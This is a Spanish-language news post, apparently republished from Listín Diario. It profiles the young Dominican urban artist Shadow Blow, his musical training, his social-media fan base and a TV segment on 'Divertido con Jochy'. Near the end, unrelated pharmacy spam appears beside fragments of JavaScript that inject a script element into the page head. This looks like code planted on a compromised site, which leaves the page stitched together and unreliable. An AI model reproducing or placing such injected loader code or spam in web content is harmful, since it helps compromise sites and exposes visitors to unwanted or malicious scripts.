Home / Publicaciones / Rincon Urbano / Shadow Blow: Rompiendo Los Parametros!!

Shadow Blow: Rompiendo Los Parametros!!

Shadow Blow tiene en la música urbana su mejor refugio para expresar todo lo que siente.< !more> Sin embargo, este joven intérprete y compositor,  productor y arreglista ya ha agotado tiempo como estudiante del Conservatorio Nacional de Música, además de que grabó con músicos de la Orquesta Sinfónica Nacional y ahora está dando pasos firmes en su carrera en el género urbano.  Allí ha ganado un blanco de público que incluye niños y jóvenes en edades entre 10 y 25 años, que no lo han visto físicamente o actuar en televisión, pero se conocen todos sus temas de principio a fin.

Mucho han tenido que ver las redes sociales, pero a la par con una importante preparación musical, temas atractivos y un trabajo de un equipo que sabe cuál es su norte, afirman sus promotores.

Aunque no ha aparecido mucho en la televisión el programa dominical “Divertido con Jochy”, que produce Edilenia Tactuk, y que conduce el comunicador Jochy Santos por Telemicro, eligió a Shadow Blow para estrenar un nuevo segmento.

“Me parece que Shadow Blow representa la nueva energía para el género urbano, un muchacho muy preparado, con mucho talento, es músico, es compositor”, dijo Edilenia Tactuk.

Shadow Blow es muy poderoso en las redes, afirmó Edilenia Tactuk. Luego agregó: “Salió todo como lo habíamos pensado, superó todas las expectativas. Creo que lo que ha pasado hoy es que estos años creando esta plataforma de fans realmente le ha funcionado súper bien, yo felicito a David Jiménez, que ha sido el responsable detrás del artista”.

Fuente: Listin Diario

  buy genuine albendazole (zentel) online document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...